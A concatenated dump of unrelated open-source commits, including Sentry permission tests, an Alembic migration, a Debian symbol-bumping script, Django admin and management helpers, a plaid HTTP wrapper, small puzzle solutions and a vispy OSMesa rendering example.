                pairs.append('%s=%s' % (key, urllib.quote(raw)))
        else:
            pairs.append('%s=%s' % (key, urllib.quote(str(value))))
    return '&'.join(pairs)
def _read_body(res):
    """Read the full response body, transparently gunzipping it when the
    server answered with Content-Encoding: gzip."""
    gzipped = res.headers.get('Content-Encoding', '') == 'gzip'
    body = res.read()
    if not gzipped:
        return body
    gzipper = gzip.GzipFile(fileobj=StringIO(body))
    try:
        return gzipper.read()
    finally:
        gzipper.close()
| apache-2.0 | Python | |
54285887dc96e3d5d98ca4c02df2a04d49ac69f7 | Add TeamPermission tests | alexm92/sentry,TedaLIEz/sentry,JamesMura/sentry,kevinlondon/sentry,BayanGroup/sentry,gg7/sentry,jokey2k/sentry,argonemyth/sentry,hongliang5623/sentry,felixbuenemann/sentry,TedaLIEz/sentry,1tush/sentry,Natim/sentry,JTCunning/sentry,llonchj/sentry,Natim/sentry,imankulov/sentry,vperron/sentry,wong2/sentry,1tush/sentry,BuildingLink/sentry,korealerts1/sentry,songyi199111/sentry,mvaled/sentry,alexm92/sentry,drcapulet/sentry,Natim/sentry,mitsuhiko/sentry,kevinastone/sentry,kevinastone/sentry,mvaled/sentry,fuziontech/sentry,songyi199111/sentry,daevaorn/sentry,pauloschilling/sentry,Kryz/sentry,ewdurbin/sentry,fotinakis/sentry,looker/sentry,BuildingLink/sentry,vperron/sentry,looker/sentry,nicholasserra/sentry,nicholasserra/sentry,mitsuhiko/sentry,ifduyue/sentry,ngonzalvez/sentry,nicholasserra/sentry,mvaled/sentry,daevaorn/sentry,BayanGroup/sentry,ifduyue/sentry,jean/sentry,mvaled/sentry,ifduyue/sentry,hongliang5623/sentry,jean/sentry,looker/sentry,daevaorn/sentry,fotinakis/sentry,pauloschilling/sentry,boneyao/sentry,JamesMura/sentry,JackDanger/sentry,beeftornado/sentry,zenefits/sentry,BuildingLink/sentry,kevinastone/sentry,JamesMura/sentry,daevaorn/sentry,wujuguang/sentry,BuildingLink/sentry,imankulov/sentry,gencer/sentry,jean/sentry,imankulov/sentry,zenefits/sentry,ngonzalvez/sentry,boneyao/sentry,JamesMura/sentry,wujuguang/sentry,ewdurbin/sentry,Kryz/sentry,ifduyue/sentry,1tush/sentry,fotinakis/sentry,kevinlondon/sentry,looker/sentry,mvaled/sentry,mvaled/sentry,jean/sentry,boneyao/sentry,jokey2k/sentry,Kryz/sentry,TedaLIEz/sentry,wong2/sentry,felixbuenemann/sentry,hongliang5623/sentry,jokey2k/sentry,JackDanger/sentry,fuziontech/sentry,gg7/sentry,JamesMura/sentry,pauloschilling/sentry,zenefits/sentry,zenefits/sentry,BuildingLink/sentry,gencer/sentry,korealerts1/sentry,drcapulet/sentry,argonemyth/sentry,gencer/sentry,JTCunning/sentry,gg7/sentry,alexm92/sentry,drcapulet/sentry,jean/sentry,ngonzalvez/sentry,k
orealerts1/sentry,gencer/sentry,zenefits/sentry,vperron/sentry,kevinlondon/sentry,ewdurbin/sentry,llonchj/sentry,BayanGroup/sentry,JackDanger/sentry,wong2/sentry,beeftornado/sentry,ifduyue/sentry,wujuguang/sentry,llonchj/sentry,fuziontech/sentry,looker/sentry,fotinakis/sentry,gencer/sentry,songyi199111/sentry,felixbuenemann/sentry,JTCunning/sentry,beeftornado/sentry,argonemyth/sentry | tests/sentry/api/bases/test_team.py | tests/sentry/api/bases/test_team.py | from __future__ import absolute_import
from mock import Mock
from sentry.api.bases.team import TeamPermission
from sentry.models import ApiKey, OrganizationMemberType, ProjectKey
from sentry.testutils import TestCase
class TeamPermissionBase(TestCase):
    """Shared fixtures and helpers for the TeamPermission test cases."""

    def setUp(self):
        # One organization with a single team; subclasses exercise access
        # to ``self.team`` under different credentials.
        self.org = self.create_organization()
        self.team = self.create_team(organization=self.org)
        super(TeamPermissionBase, self).setUp()

    def has_object_perm(self, auth, user, obj, method='GET'):
        """Evaluate TeamPermission for a fake request and return the verdict."""
        fake_request = Mock(auth=auth, user=user, method=method)
        return TeamPermission().has_object_permission(fake_request, None, obj)
class TeamPermissionTest(TeamPermissionBase):
    """Object-permission matrix for TeamPermission: users, org members,
    project keys and API keys against a single team."""

    def test_regular_user(self):
        user = self.create_user()
        assert not self.has_object_perm(None, user, self.team)

    def test_superuser(self):
        user = self.create_user(is_superuser=True)
        assert self.has_object_perm(None, user, self.team)

    def test_org_member_without_team_access(self):
        user = self.create_user()
        # Plain membership (no global access, no team link) grants nothing.
        self.create_member(
            user=user,
            organization=self.org,
            type=OrganizationMemberType.MEMBER,
            has_global_access=False,
        )
        assert not self.has_object_perm(None, user, self.team)

    def test_org_member_with_global_access(self):
        user = self.create_user()
        self.create_member(
            user=user,
            organization=self.org,
            type=OrganizationMemberType.MEMBER,
            has_global_access=True,
        )
        assert self.has_object_perm(None, user, self.team)

    def test_org_member_with_team_access(self):
        user = self.create_user()
        om = self.create_member(
            user=user,
            organization=self.org,
            type=OrganizationMemberType.MEMBER,
            has_global_access=False,
        )
        om.teams.add(self.team)
        assert self.has_object_perm(None, user, self.team)

    def test_project_key(self):
        # Project keys never grant team-level access.
        key = ProjectKey.objects.create(
            project=self.create_project(team=self.team),
        )
        assert not self.has_object_perm(key, None, self.team)

    def test_api_key_with_org_access(self):
        key = ApiKey.objects.create(
            organization=self.org,
        )
        assert self.has_object_perm(key, None, self.team)

    def test_api_key_without_org_access(self):
        key = ApiKey.objects.create(
            organization=self.create_organization(),
        )
        assert not self.has_object_perm(key, None, self.team)
| bsd-3-clause | Python | |
aeabc254a09047a58ea5b5c16fb2c5e7e9008691 | Test generator expressions | alexmojaki/snoop,alexmojaki/snoop | tests/samples/generator_expression.py | tests/samples/generator_expression.py | import snoop
@snoop(depth=2)
def main():
    return list(x * 2 for x in [1, 2])
# NOTE: do not insert (or document) lines above this point -- the
# `expected_output` string below embeds the source line numbers (5 and 6)
# that snoop echoes while tracing main(), and any shift breaks the sample.
if __name__ == '__main__':
    main()
expected_output = """
12:34:56.78 >>> Call to main in File "/path/to_file.py", line 5
12:34:56.78 5 | def main():
12:34:56.78 6 | return list(x * 2 for x in [1, 2])
12:34:56.78 >>> Start generator <genexpr> in File "/path/to_file.py", line 6
12:34:56.78 6 | return list(x * 2 for x in [1, 2])
12:34:56.78 6 | return list(x * 2 for x in [1, 2])
12:34:56.78 .......... Iterating over <tupleiterator object at 0xABC>
12:34:56.78 .......... x = 1
12:34:56.78 <<< Yield value from <genexpr>: 2
12:34:56.78 >>> Re-enter generator <genexpr> in File "/path/to_file.py", line 6
12:34:56.78 6 | return list(x * 2 for x in [1, 2])
12:34:56.78 6 | return list(x * 2 for x in [1, 2])
12:34:56.78 .......... Iterating over <tupleiterator object at 0xABC>
12:34:56.78 .......... x = 2
12:34:56.78 <<< Yield value from <genexpr>: 4
12:34:56.78 >>> Re-enter generator <genexpr> in File "/path/to_file.py", line 6
12:34:56.78 6 | return list(x * 2 for x in [1, 2])
12:34:56.78 6 | return list(x * 2 for x in [1, 2])
12:34:56.78 .......... Iterating over <tupleiterator object at 0xABC>
12:34:56.78 .......... x = 2
12:34:56.78 <<< Return value from <genexpr>: None
12:34:56.78 6 | return list(x * 2 for x in [1, 2])
12:34:56.78 <<< Return value from main: [2, 4]
"""
| mit | Python | |
8e049c956045b3d5cc37db0041e71b637f556408 | add DB migration | JING-TIME/ustc-course,JING-TIME/ustc-course,JING-TIME/ustc-course,JING-TIME/ustc-course,JING-TIME/ustc-course | migrations/versions/2316c9808a5_.py | migrations/versions/2316c9808a5_.py | """empty message
Revision ID: 2316c9808a5
Revises: 26fbbffb991
Create Date: 2015-04-16 13:46:41.849087
"""
# revision identifiers, used by Alembic.
revision = '2316c9808a5'
down_revision = '26fbbffb991'
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Apply: add homepage columns (courses/teachers/users), a teachers.avatar
    column, and a foreign key from teachers.avatar to image_store.id."""
    ### commands auto generated by Alembic - please adjust! ###
    op.add_column('courses', sa.Column('homepage', sa.Text(), nullable=True))
    op.add_column('teachers', sa.Column('avatar', sa.Integer(), nullable=True))
    op.add_column('teachers', sa.Column('homepage', sa.Text(), nullable=True))
    # NOTE(review): constraint name is None, so it is auto-named by the
    # backend/naming convention -- the matching drop_constraint(None, ...)
    # in downgrade() needs an explicit name on most backends; confirm
    # downgrade actually works before relying on it.
    op.create_foreign_key(None, 'teachers', 'image_store', ['avatar'], ['id'])
    op.add_column('users', sa.Column('homepage', sa.Text(), nullable=True))
    ### end Alembic commands ###
def downgrade():
    """Revert: drop the columns and foreign key added by upgrade()."""
    ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('users', 'homepage')
    # NOTE(review): dropping an unnamed constraint (None) fails on most
    # backends -- Alembic cannot infer the generated FK name; confirm.
    op.drop_constraint(None, 'teachers', type_='foreignkey')
    op.drop_column('teachers', 'homepage')
    op.drop_column('teachers', 'avatar')
    op.drop_column('courses', 'homepage')
    ### end Alembic commands ###
| agpl-3.0 | Python | |
0ca24ff03f6382c23995f662b678e457a8394140 | Add script to bump symbol versions | agx/libvirt-debian,agx/libvirt-debian,agx/libvirt-debian,agx/libvirt-debian,agx/libvirt-debian | debian/bump-symbols.py | debian/bump-symbols.py | #!/usr/bin/python
#
# Bump symbol versions of libvirt0
# Usage: ./bump-symbols.py 1.2.16~rc2
import os
import re
import sys
import shutil
import subprocess
#import gbp.git.GitRepository
symbols_file = 'debian/libvirt0.symbols'
symbols_new_file = symbols_file + '.new'
# Validate the command line *before* touching any files: the old code
# opened and truncated the .new file first, leaving litter behind when
# invoked without a version argument.
if len(sys.argv) != 2:
    print >>sys.stderr, "Need a version"
    sys.exit(1)
version = sys.argv[1]
# Debian pre-release versions look like 1.2.16~rc2; the symbols file keys
# off the upstream part only.
s_version = version.split('~', 1)[0]
symbols = open(symbols_file)
# Use the already-defined symbols_new_file instead of re-deriving the name.
symbols_new = open(symbols_new_file, 'w+')
for line in symbols.readlines():
    m = re.match('(?P<pre>.*LIBVIRT_(?P<admin>ADMIN_)?PRIVATE_)(?P<v>[a-z0-9.]+) ',
                 line)
    if m:
        if not m.group('admin'):
            # Non-admin (public) symbol sets also get a catch-all entry
            # for the new release version.
            symbols_new.write(' *@LIBVIRT_%s %s\n' % (s_version, version))
        symbols_new.write("%s%s %s\n" %
                          (m.group('pre'), s_version, version))
    else:
        symbols_new.write(line)
symbols.close()
symbols_new.close()
os.unlink(symbols_file)
shutil.move(symbols_new_file, symbols_file)
subprocess.call(['git', 'commit', '-m', 'Bump symbol versions', symbols_file])
| lgpl-2.1 | Python | |
4435eb504b10855088f006456dfface89a4a8798 | create first easy mixin | ebertti/django-admin-easy,ebertti/django-admin-easy | easy/admin/mixin.py | easy/admin/mixin.py | # coding: utf-8
from django.conf.urls import url
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.http.response import HttpResponseRedirect
class MixinEasyViews(object):
    """Admin mixin that maps ``.../easy/<action>/`` URLs to
    ``easy_view_<action>`` methods on the ModelAdmin, for both a single
    object and the changelist."""

    def get_urls(self):
        urls = super(MixinEasyViews, self).get_urls()
        info = self.model._meta.app_label, self.model._meta.model_name
        # NOTE(review): both patterns register under the *same* URL name,
        # so reverse() can only ever resolve one of them -- confirm intended.
        easy_urls = [
            url(r'^(?P<pk>.+)/easy/(?P<action>.+)/$', self.admin_site.admin_view(self.easy_object_view),
                name='%s_%s_easy' % info),
            url(r'^easy/(?P<action>.+)/$', self.admin_site.admin_view(self.easy_list_view),
                name='%s_%s_easy' % info),
        ]
        return easy_urls + urls

    def _find_easy_view(self, request, action):
        """Return the ``easy_view_<action>`` method, or None after queueing
        an error message when no such method exists."""
        method_name = 'easy_view_%s' % action
        view = getattr(self, method_name, None)
        if view is None:
            # message typo fixed: 'not founded' -> 'not found'
            self.message_user(request, 'Easy view %s not found' % method_name, messages.ERROR)
        return view

    def easy_object_view(self, request, pk, action):
        """Dispatch an object-level easy view; fall back to the change page."""
        view = self._find_easy_view(request, action)
        if view is not None:
            return view(request, pk)
        info = self.model._meta.app_label, self.model._meta.model_name
        redirect = reverse('admin:%s_%s_change' % info, args=(pk,))
        return HttpResponseRedirect(redirect)

    def easy_list_view(self, request, action):
        """Dispatch a list-level easy view; fall back to the changelist."""
        view = self._find_easy_view(request, action)
        if view is not None:
            return view(request)
        info = self.model._meta.app_label, self.model._meta.model_name
        redirect = reverse('admin:%s_%s_changelist' % info,)
return HttpResponseRedirect(redirect) | mit | Python | |
27640acedbd945d22db1f26dce75c107c21e988d | Add tests suite for web oriented tags. | TamiaLab/PySkCode | tests/tests_tags/tests_webspecials.py | tests/tests_tags/tests_webspecials.py | """
SkCode web oriented tag test code.
"""
import unittest
from skcode.etree import TreeNode
from skcode.tags import (HorizontalLineTagOptions,
LineBreakTagOptions,
DEFAULT_RECOGNIZED_TAGS)
class HorizontalLineTagTestCase(unittest.TestCase):
    """ Tests suite for the horizontal line tag module. """

    def test_tag_and_aliases_in_default_recognized_tags_dict(self):
        """ Test the presence of the tag and aliases in the dictionary of default recognized tags. """
        self.assertIn('hr', DEFAULT_RECOGNIZED_TAGS)
        self.assertIsInstance(DEFAULT_RECOGNIZED_TAGS['hr'], HorizontalLineTagOptions)

    def test_tag_constant_values(self):
        """ Test tag constants. """
        opts = HorizontalLineTagOptions()
        expected_flags = (
            ('newline_closes', False),
            ('same_tag_closes', False),
            ('standalone', True),
            ('parse_embedded', True),
            ('swallow_trailing_newline', False),
            ('inline', False),
            ('close_inlines', True),
            ('make_paragraphs_here', False),
        )
        for attr_name, expected in expected_flags:
            if expected:
                self.assertTrue(getattr(opts, attr_name))
            else:
                self.assertFalse(getattr(opts, attr_name))

    def test_render_html(self):
        """ Test the ``render_html`` method. """
        rendered = HorizontalLineTagOptions().render_html(None, '')
        self.assertEqual('<hr>\n', rendered)

    def test_render_text(self):
        """ Test the ``render_text`` method. """
        rendered = HorizontalLineTagOptions().render_text(None, '')
        self.assertEqual('----------\n', rendered)

    def test_render_skcode(self):
        """ Test the ``render_skcode`` method. """
        opts = HorizontalLineTagOptions()
        node = TreeNode(None, 'hr', opts)
        self.assertEqual('[hr]', opts.render_skcode(node, ''))
class LineBreakTagTestCase(unittest.TestCase):
    """ Tests suite for the line break tag module. """

    def test_tag_and_aliases_in_default_recognized_tags_dict(self):
        """ Test the presence of the tag and aliases in the dictionary of default recognized tags. """
        self.assertIn('br', DEFAULT_RECOGNIZED_TAGS)
        self.assertIsInstance(DEFAULT_RECOGNIZED_TAGS['br'], LineBreakTagOptions)

    def test_tag_constant_values(self):
        """ Test tag constants. """
        opts = LineBreakTagOptions()
        # Flags expected to be disabled on a line-break tag.
        for attr_name in ('newline_closes', 'same_tag_closes',
                          'swallow_trailing_newline', 'inline',
                          'make_paragraphs_here'):
            self.assertFalse(getattr(opts, attr_name))
        # Flags expected to be enabled.
        for attr_name in ('standalone', 'parse_embedded', 'close_inlines'):
            self.assertTrue(getattr(opts, attr_name))

    def test_render_html(self):
        """ Test the ``render_html`` method. """
        rendered = LineBreakTagOptions().render_html(None, '')
        self.assertEqual('<br>\n', rendered)

    def test_render_text(self):
        """ Test the ``render_text`` method. """
        rendered = LineBreakTagOptions().render_text(None, '')
        self.assertEqual('\n', rendered)

    def test_render_skcode(self):
        """ Test the ``render_skcode`` method. """
        opts = LineBreakTagOptions()
        node = TreeNode(None, 'br', opts)
        self.assertEqual('[br]', opts.render_skcode(node, ''))
| agpl-3.0 | Python | |
a5950853ae7cfe9ac4fce7f297722231feae2f44 | switch if/else per David's review comments | qwil/plaid-python,LawnmowerIO/plaid-python,Affirm/plaid-python,plaid/plaid-python,erikbern/plaid-python | plaid/http.py | plaid/http.py | ##############################################################################
# Helper module that encapsulates the HTTPS request so that it can be used
# with multiple runtimes. PK Mar. 14
##############################################################################
import os
import urllib
# Command line
def _requests_http_request(url, method, data):
    """Dispatch `method` to the matching `requests` helper (command line)."""
    import requests
    verb = method.upper()
    dispatch = {
        'GET': requests.get,
        'POST': requests.post,
        'PUT': requests.put,
        'DELETE': requests.delete,
        'PATCH': requests.patch,
    }
    # Unknown verbs fail with AssertionError, like the old if/elif chain.
    assert verb in dispatch
    return dispatch[verb](url, data = data)
# Google App Engine
def _urlfetch_http_request(url, method, data):
    """Perform the request with App Engine's urlfetch service."""
    from google.appengine.api import urlfetch
    verb = method.upper()
    qs = urllib.urlencode(data)
    if verb == 'POST':
        payload = qs
    else:
        # Non-POST requests carry the data in the query string instead.
        payload = None
        url += '?' + qs
    response = urlfetch.fetch(url, follow_redirects = True, method = verb, payload = payload)
    # Mirror the `requests` Response.ok attribute for a uniform interface.
    response.ok = 200 <= response.status_code < 300
    return response
_is_appengine = None

def http_request(url, method, data = {}):
    """Send an HTTP request with whichever backend fits the runtime.

    On Google App Engine (detected via SERVER_SOFTWARE) this delegates to
    urlfetch; everywhere else it uses the `requests` library.  `data` is
    never mutated, so the shared default dict is harmless.
    """
    global _is_appengine
    if _is_appengine is None:
        ss = os.environ.get('SERVER_SOFTWARE', '')
        # Cache a real bool: the old code cached `ss and (...)`, which left
        # None in place when SERVER_SOFTWARE was unset and re-ran the
        # environment probe on every single call.
        _is_appengine = bool(ss and (ss.startswith('Development/') or ss.startswith('Google App Engine/')))
    if _is_appengine:
        return _urlfetch_http_request(url, method, data)
    else:
        return _requests_http_request(url, method, data)
| ##############################################################################
# Helper module that encapsulates the HTTPS request so that it can be used
# with multiple runtimes. PK Mar. 14
##############################################################################
import os
import urllib
# Command line
def _requests_http_request(url, method, data):
    """Perform the request with the `requests` library (non-App Engine)."""
    import requests
    verb = method.upper()
    supported = ('GET', 'POST', 'PUT', 'DELETE', 'PATCH')
    # Unsupported verbs raise AssertionError, matching the old fall-through.
    assert verb in supported
    handler = getattr(requests, verb.lower())
    return handler(url, data = data)
# Google App Engine
def _urlfetch_http_request(url, method, data):
    """App Engine implementation: query-string encode `data`, call urlfetch."""
    from google.appengine.api import urlfetch
    verb = method.upper()
    encoded = urllib.urlencode(data)
    payload = None
    if verb == 'POST':
        payload = encoded
    else:
        # Non-POST verbs pass the data in the URL instead of the body.
        url += '?' + encoded
    response = urlfetch.fetch(url,
                              follow_redirects = True,
                              method = verb,
                              payload = payload)
    # Mirror requests' Response.ok so callers see a uniform interface.
    response.ok = (response.status_code >= 200) and (response.status_code < 300)
    return response
_is_appengine = None

def http_request(url, method, data = {}):
    """Route the request to the right backend for the current runtime.

    Uses App Engine's urlfetch when SERVER_SOFTWARE says we run on GAE,
    otherwise the `requests` library.  `data` is never mutated, so the
    shared default dict is harmless.
    """
    global _is_appengine
    if _is_appengine is None:
        ss = os.environ.get('SERVER_SOFTWARE', '')
        # Cache a real bool: the old code cached `ss and (...)`, which kept
        # None when SERVER_SOFTWARE was unset and re-probed on every call.
        _is_appengine = bool(ss and (ss.startswith('Development/') or ss.startswith('Google App Engine/')))
    if not _is_appengine:
        return _requests_http_request(url, method, data)
    else:
        return _urlfetch_http_request(url, method, data)
| mit | Python |
a5c99fe8e37079a2663fe90644d3925d6dc7a5d0 | Add another example that works offline | seleniumbase/SeleniumBase,mdmintz/SeleniumBase,seleniumbase/SeleniumBase,mdmintz/SeleniumBase,mdmintz/SeleniumBase,mdmintz/SeleniumBase,seleniumbase/SeleniumBase,seleniumbase/SeleniumBase | examples/offline_examples/test_request_fixture.py | examples/offline_examples/test_request_fixture.py | import pytest
@pytest.mark.offline
def test_request_fixture(request):
    # Pull the SeleniumBase "sb" fixture lazily via pytest's built-in
    # `request` fixture instead of declaring it as a test parameter.
    sb = request.getfixturevalue('sb')
    # A data: URL keeps the whole test offline (no network needed).
    sb.open("data:text/html,<p>Hello<br><input></p>")
    sb.assert_element("html > body")
    sb.assert_text("Hello", "body p")
    sb.type("input", "Goodbye")
    sb.click("body p")
    # NOTE(review): tearDown() appears to be required when the fixture is
    # obtained through getfixturevalue() -- presumably pytest's finalizer
    # does not run it in this mode; confirm against SeleniumBase docs.
    sb.tearDown()
| mit | Python | |
f31fb6a06c9f0126f43e7b1208502f67f7605d33 | Add the-love-letter-mistery | davide-ceretti/hackerrank.com | the-love-letter-mystery/solution.py | the-love-letter-mystery/solution.py | from math import fabs
def solve(string):
    """Return the minimum number of single-letter decrements needed to turn
    `string` into a palindrome (HackerRank "Love Letter Mystery").

    Each operation lowers one character by one step (e.g. 'c' -> 'b'), so
    the cost of fixing a mirrored pair is the absolute difference of the
    two character codes.

    Examples from the original notes:
    abc -> abb -> aba (2)
    abcba (0)
    abcd -> abcc -> abcb -> abca -> abba (4)
    cba -> bba -> aba (2)
    """
    codes = [ord(ch) for ch in string]
    n = len(codes)
    # Strings of length 0 or 1 have no mirrored pairs and cost 0.  The old
    # special case `return True` for length 1 printed "True" instead of 0.
    # Integer abs() keeps everything integral (no need for math.fabs).
    return sum(abs(codes[i] - codes[n - 1 - i]) for i in range(n // 2))
# HackerRank driver (Python 2): first line is the number of test cases,
# then one string per line.
t = raw_input()
for _ in xrange(int(t)):
    print solve(raw_input())
| mit | Python | |
01589a78cbe3bcabd116b9943f23ab3e8bc6a158 | Create irrigate.py | Python-IoT/Smart-IoT-Planting-System,Python-IoT/Smart-IoT-Planting-System | device/src/irrigate.py | device/src/irrigate.py | #!/usr/bin/env python
# In this project a servo stands in for the water tap:
# rotating to 90 degrees means the tap is open, 0 degrees means closed.
from pyb import Servo
# Servo plugged into pyboard servo position 1 (pin X1).
servo=Servo(1) # X1
def irrigate_start():
    """Open the simulated water tap (drive the servo to 90 degrees)."""
    servo.angle(90)
def irrigate_stop():
    """Close the simulated water tap (drive the servo back to 0 degrees)."""
    servo.angle(0)
| mit | Python | |
a2296ae2165b60ba182d540f729a099183169c92 | Add problem 40, decimal fraction digits | dimkarakostas/project-euler | problem_40.py | problem_40.py | from time import time
def main():
    """Project Euler 40: product of selected digits of Champernowne's constant.

    Builds at least the first 1,000,000 decimal digits of
    0.123456789101112... and prints d(1)*d(10)*...*d(1000000).
    """
    # Collect number strings and join once at the end: the old
    # `fractional_part += str(i)` loop is quadratic in the worst case.
    chunks = []
    total_len = 0
    i = 1
    while total_len < 1000000:
        part = str(i)
        chunks.append(part)
        total_len += len(part)
        i += 1
    digits = ''.join(chunks)
    prod = 1
    for pos in [1, 10, 100, 1000, 10000, 100000, 1000000]:
        prod *= int(digits[pos - 1])
    # Parenthesized single-argument print yields "Product: <n>" identically
    # on Python 2 and 3.
    print('Product: %d' % prod)
if __name__ == '__main__':
    # Time the computation and report it (Python 2 print-statement syntax).
    t = time()
    main()
    print 'Time:', time() - t
| mit | Python | |
e9b6a27a423e765033d04801762f9f0356cd992a | Add urls.py ,placeholder for urls mappings in the plots app | ankeshanand/benchmark,ankeshanand/benchmark,ankeshanand/benchmark,ankeshanand/benchmark | plots/urls.py | plots/urls.py | __author__ = 'ankesh'
from django.conf.urls import patterns, url
| bsd-2-clause | Python | |
dc1bcdfed7439e1e00fdcad058fd9acbc1fac466 | add initadmin to management base commands | fiduswriter/fiduswriter,fiduswriter/fiduswriter,fiduswriter/fiduswriter,fiduswriter/fiduswriter | fiduswriter/base/management/commands/initadmin.py | fiduswriter/base/management/commands/initadmin.py | # code adapted by github.com/jobdiogenes from https://github.com/dkarchmer/aws-eb-docker-django/blob/master/authentication/manage
# used to help automation install like in docker.
# Create admins accounts if no users exists.
# Password 'admin' is used unless defined by ADMIN_PASSWORD
from django.conf import settings
from django.core.management.base import BaseCommand
from django.contrib.auth.models import User
from os import getenv
class Command(BaseCommand):
def handle(self, *args, **options):
if User.objects.count() == 0:
for user in settings.ADMINS:
username = user[0].replace(' ', '')
email = user[1]
password = getenv('ADMIN_PASSWORD') if getenv('ADMIN_PASSWORD')!='' else 'admin'
print('Creating account for %s (%s)' % (username, email))
admin = User.objects.create_superuser(username=username, email=email, password=password
admin.is_active = True
admin.is_admin = True
admin.save()
else:
print('Admin accounts can only be initialized if no Accounts exist') | agpl-3.0 | Python | |
dba312802cbf73f54c7cc347d45430ac0d8f016c | add TicketFactory | Christophe31/django-tickets,byteweaver/django-tickets,byteweaver/django-tickets,Christophe31/django-tickets | tickets/tests/factories.py | tickets/tests/factories.py | from django.contrib.auth.models import User
import factory
from tickets.models import Ticket
class UserFactory(factory.Factory):
    # Legacy factory_boy (pre-2.4) declaration style; newer versions use
    # ``class Meta: model = User`` instead -- TODO confirm pinned version.
    FACTORY_FOR = User
class TicketFactory(factory.Factory):
    # Legacy factory_boy declaration style (pre-``class Meta``).
    FACTORY_FOR = Ticket
    # Build a fresh creator per ticket; LazyAttribute defers the call until
    # instantiation time (its argument is the object under construction).
    creator = factory.LazyAttribute(lambda a: UserFactory())
| bsd-3-clause | Python | |
9d77092729e534b19d75b38dd700df25a009fa49 | Add script to convexify the energies of a conservation tracking JSON model | chaubold/hytra,chaubold/hytra,chaubold/hytra | toolbox/convexify_costs.py | toolbox/convexify_costs.py | import sys
import commentjson as json
import os
import argparse
import numpy as np
def listify(l):
    """Wrap every element of *l* in its own one-element list."""
    return [[item] for item in l]
def convexify(l):
    """Return a convexified copy of the one-feature-per-state cost list *l*.

    Starting at the minimum-cost state, walks outward in both directions
    and raises any feature value whose gradient would flatten, so the
    resulting energies are convex.  The input shape (a list of one-element
    lists) is preserved in the return value.

    Raises:
        ValueError: if there is more than one feature per state.
    """
    features = np.array(l)
    if features.shape[1] != 1:
        # was `InvalidArgumentException`, which is undefined anywhere in
        # this script and would itself have surfaced as a NameError
        raise ValueError('This script can only convexify feature vectors with one feature per state!')
    bestState = np.argmin(features)
    for direction in [-1, 1]:
        pos = bestState + direction
        previousGradient = 0
        while pos >= 0 and pos < features.shape[0]:
            newGradient = features[pos] - features[pos - direction]
            if abs(newGradient) < abs(previousGradient):
                # cost function got too flat, set feature value to match old slope
                features[pos] = features[pos - direction] + previousGradient
            else:
                # all good, continue with new slope
                previousGradient = newGradient
            pos += direction
    return listify(features.flatten())
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Take a json file containing a result to a set of HDF5 events files')
parser.add_argument('--model', required=True, type=str, dest='model_filename',
help='Filename of the json model description')
parser.add_argument('--output', required=True, type=str, dest='result_filename',
help='Filename of the json file containing the model with convexified costs')
args = parser.parse_args()
with open(args.model_filename, 'r') as f:
model = json.load(f)
if not model['settings']['statesShareWeights']:
raise InvalidArgumentException('This script can only convexify feature vectors with shared weights!')
segmentationHypotheses = model['segmentationHypotheses']
for seg in segmentationHypotheses:
for f in ['features', 'appearanceFeatures', 'disappearanceFeatures']:
if f in seg:
seg[f] = convexify(seg[f])
# division features are always convex (is just a line)
linkingHypotheses = model['linkingHypotheses']
for link in linkingHypotheses:
link['features'] = convexify(link['features'])
with open(args.result_filename, 'w') as f:
json.dump(model, f, indent=4, separators=(',', ': ')) | mit | Python | |
9090f48b5abb5c60c8629613724ff7309dee07f5 | Fix restructured text rendering in simple_osmesa.py | michaelaye/vispy,dchilds7/Deysha-Star-Formation,drufat/vispy,ghisvail/vispy,Eric89GXL/vispy,jdreaver/vispy,julienr/vispy,jdreaver/vispy,dchilds7/Deysha-Star-Formation,dchilds7/Deysha-Star-Formation,ghisvail/vispy,michaelaye/vispy,bollu/vispy,inclement/vispy,michaelaye/vispy,julienr/vispy,jdreaver/vispy,julienr/vispy,bollu/vispy,inclement/vispy,drufat/vispy,inclement/vispy,bollu/vispy,QuLogic/vispy,QuLogic/vispy,Eric89GXL/vispy,Eric89GXL/vispy,QuLogic/vispy,ghisvail/vispy,drufat/vispy | examples/offscreen/simple_osmesa.py | examples/offscreen/simple_osmesa.py | # -*- coding: utf-8 -*-
# vispy: testskip
# Copyright (c) 2015, Vispy Development Team.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
"""
This is a simple osmesa example that produce an image of a cube
If you have both osmesa and normal (X) OpenGL installed, execute with
something like the following to pickup the OSMesa libraries::
VISPY_GL_LIB=/opt/osmesa_llvmpipe/lib/libGLESv2.so \
LD_LIBRARY_PATH=/opt/osmesa_llvmpipe/lib/ \
OSMESA_LIBRARY=/opt/osmesa_llvmpipe/lib/libOSMesa.so \
python examples/offscreen/simple_osmesa.py
"""
import vispy
vispy.use(app='osmesa') # noqa
import numpy as np
import vispy.plot as vp
import vispy.io as io
# Check the application correctly picked up osmesa
assert vispy.app.use_app().backend_name == 'osmesa', 'Not using OSMesa'
# NOTE(review): `data` and `time` are loaded/derived but never used by the
# plot below -- presumably leftovers; load_data_file() also downloads and
# caches the file on first use, so confirm before removing.
data = np.load(io.load_data_file('electrophys/iv_curve.npz'))['arr_0']
time = np.arange(0, data.shape[1], 1e-4)
# Build an off-screen figure; show=False because rendering goes to a PNG.
fig = vp.Fig(size=(800, 800), show=False)
x = np.linspace(0, 10, 20)
y = np.cos(x)
line = fig[0, 0].plot((x, y), symbol='o', width=3, title='I/V Curve',
                      xlabel='Current (pA)', ylabel='Membrane Potential (mV)')
grid = vp.visuals.GridLines(color=(0, 0, 0, 0.5))
grid.set_gl_state('translucent')
fig[0, 0].view.add(grid)
fig.show()
# render() rasterizes in software via OSMesa; no display server is needed.
img = fig.render()
io.write_png("osmesa.png", img)
| # -*- coding: utf-8 -*-
# vispy: testskip
# Copyright (c) 2015, Vispy Development Team.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
"""
This is a simple osmesa example that produce an image of a cube
If you have both osmesa and normal (X) OpenGL installed, execute with
something like the following to pickup the OSMesa libraries::
    VISPY_GL_LIB=/opt/osmesa_llvmpipe/lib/libGLESv2.so \
    LD_LIBRARY_PATH=/opt/osmesa_llvmpipe/lib/ \
    OSMESA_LIBRARY=/opt/osmesa_llvmpipe/lib/libOSMesa.so \
    python examples/offscreen/simple_osmesa.py
"""
import vispy
vispy.use(app='osmesa') # noqa
import numpy as np
import vispy.plot as vp
import vispy.io as io
# Check the application correctly picked up osmesa
assert vispy.app.use_app().backend_name == 'osmesa', 'Not using OSMesa'
